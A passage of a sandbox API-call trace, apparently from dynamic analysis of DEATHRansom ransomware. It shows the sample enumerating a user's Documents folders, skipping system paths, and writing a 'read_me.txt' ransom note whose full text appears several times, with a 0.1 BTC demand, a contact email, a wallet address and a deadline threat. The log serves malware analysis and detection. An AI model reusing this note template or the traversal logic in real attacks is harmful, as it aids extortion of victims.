Flags=0x8, Size=0xfffe) returned 0x8c50130 [0075.463] wnsprintfW (in: pszDest=0x8c50130, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*") returned 64 [0075.463] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*", lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe9e8 [0075.556] wnsprintfW (in: pszDest=0x8c50130, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\.") returned 64 [0075.556] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.556] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.556] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.556] wnsprintfW (in: pszDest=0x8c50130, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\..") returned 65 [0075.556] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.556] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0075.556] wnsprintfW (in: pszDest=0x8c50130, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico") returned 73 [0075.556] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="folder.ico", cAlternateFileName="")) returned 0 [0075.556] FindClose (in: hFindFile=0x7cfe9e8 | out: hFindFile=0x7cfe9e8) returned 1 [0075.556] wnsprintfW (in: pszDest=0x8c50130, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\read_me.txt") returned 74 [0075.556] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7b8 [0075.557] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.557] WriteFile (in: hFile=0x7b8, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17d7f4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17d7f4*=0x6b3, lpOverlapped=0x0) returned 1 [0075.558] CloseHandle (hObject=0x7b8) returned 1 [0075.558] GetProcessHeap () returned 0x4f10000 [0075.558] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8c50130 | out: hHeap=0x4f10000) returned 1 [0075.558] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="_private", cAlternateFileName="")) returned 0 [0075.558] FindClose (in: hFindFile=0x7cfe9a8 | out: hFindFile=0x7cfe9a8) returned 1 [0075.558] wnsprintfW (in: pszDest=0x8c40128, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\read_me.txt") returned 65 [0075.558] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7b4 [0075.558] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.558] WriteFile (in: hFile=0x7b4, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17da6c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17da6c*=0x6b3, lpOverlapped=0x0) returned 1 [0075.559] CloseHandle (hObject=0x7b4) returned 1 [0075.559] GetProcessHeap () returned 0x4f10000 [0075.560] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8c40128 | out: hHeap=0x4f10000) returned 1 [0075.560] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0075.560] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos") returned 53 [0075.560] lstrcmpW (lpString1="My Videos", lpString2="..") returned 1 [0075.560] lstrcmpW (lpString1="My Videos", lpString2=".") returned 1 [0075.560] StrStrW (lpFirst="my videos", lpSrch="programdata") returned 0x0 [0075.560] StrStrW (lpFirst="my videos", lpSrch="$recycle.bin") returned 0x0 [0075.560] StrStrW (lpFirst="my videos", lpSrch="program files") returned 0x0 [0075.560] StrStrW (lpFirst="my videos", lpSrch="windows") returned 0x0 [0075.560] StrStrW (lpFirst="my videos", lpSrch="all users") returned 0x0 [0075.560] StrStrW (lpFirst="my videos", lpSrch="appdata") returned 0x0 [0075.560] GetProcessHeap () returned 0x4f10000 [0075.560] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8c40128 [0075.560] lstrcpyW (in: lpString1=0x8c40128, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos" [0075.560] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 58 [0075.560] QueueUserWorkItem (Function=0x40a710, Context=0x8c40128, Flags=0x0) returned 1 [0075.560] GetProcessHeap () returned 0x4f10000 [0075.560] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8c50130 [0075.560] wnsprintfW (in: pszDest=0x8c50130, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*") returned 55 [0075.560] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*", lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="_private", cAlternateFileName="廠疙휎᥵?\x17甴?\x17a")) returned 0xffffffff [0075.560] wnsprintfW (in: pszDest=0x8c50130, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\read_me.txt") returned 65 [0075.560] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my videos\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7b4 [0075.561] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.561] WriteFile (in: hFile=0x7b4, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17da6c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17da6c*=0x6b3, lpOverlapped=0x0) returned 1 [0075.562] CloseHandle (hObject=0x7b4) returned 1 [0075.562] GetProcessHeap () returned 0x4f10000 [0075.562] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8c50130 | out: hHeap=0x4f10000) returned 1 [0075.562] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21a18e60, ftCreationTime.dwHighDateTime=0x1d54fd2, ftLastAccessTime.dwLowDateTime=0xe2254cd0, ftLastAccessTime.dwHighDateTime=0x1d5179c, ftLastWriteTime.dwLowDateTime=0xe2254cd0, ftLastWriteTime.dwHighDateTime=0x1d5179c, nFileSizeHigh=0x0, nFileSizeLow=0x17dbc, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="n9o52Fm.pptx", cAlternateFileName="N9O52F~1.PPT")) returned 1 [0075.562] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\n9o52Fm.pptx") returned 56 [0075.562] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5c4f8e60, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5c4f8e60, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0075.562] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files") returned 57 [0075.562] lstrcmpW (lpString1="Outlook Files", lpString2="..") returned 1 [0075.562] lstrcmpW (lpString1="Outlook Files", lpString2=".") returned 1 [0075.562] StrStrW (lpFirst="outlook files", lpSrch="programdata") returned 0x0 [0075.562] StrStrW (lpFirst="outlook files", lpSrch="$recycle.bin") returned 0x0 [0075.562] StrStrW (lpFirst="outlook files", lpSrch="program files") returned 0x0 [0075.562] StrStrW (lpFirst="outlook files", lpSrch="windows") returned 0x0 [0075.562] StrStrW (lpFirst="outlook files", lpSrch="all users") returned 0x0 [0075.562] StrStrW (lpFirst="outlook files", lpSrch="appdata") returned 0x0 [0075.562] GetProcessHeap () returned 0x4f10000 [0075.562] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8c50130 [0075.562] lstrcpyW (in: lpString1=0x8c50130, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files" [0075.562] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 59 [0075.562] QueueUserWorkItem (Function=0x40a710, Context=0x8c50130, Flags=0x0) returned 1 [0075.562] GetProcessHeap () returned 0x4f10000 [0075.562] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8c60138 [0075.563] wnsprintfW (in: pszDest=0x8c60138, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*") returned 59 [0075.563] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*", lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5c4f8e60, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5c4f8e60, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe9a8 [0075.564] wnsprintfW (in: pszDest=0x8c60138, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\.") returned 59 [0075.564] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.564] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.564] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5c4f8e60, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5c4f8e60, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.564] wnsprintfW (in: pszDest=0x8c60138, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\..") returned 60 [0075.564] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.564] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x6228cf40, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 1 [0075.564] wnsprintfW (in: pszDest=0x8c60138, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst") returned 80 [0075.564] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x6228cf40, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 0 [0075.564] FindClose (in: hFindFile=0x7cfe9a8 | out: hFindFile=0x7cfe9a8) returned 1 [0075.564] wnsprintfW (in: pszDest=0x8c60138, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\read_me.txt") returned 69 [0075.564] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7b4 [0075.565] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.565] WriteFile (in: hFile=0x7b4, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17da6c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17da6c*=0x6b3, lpOverlapped=0x0) returned 1 [0075.565] CloseHandle (hObject=0x7b4) returned 1 [0075.566] GetProcessHeap () returned 0x4f10000 [0075.566] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, 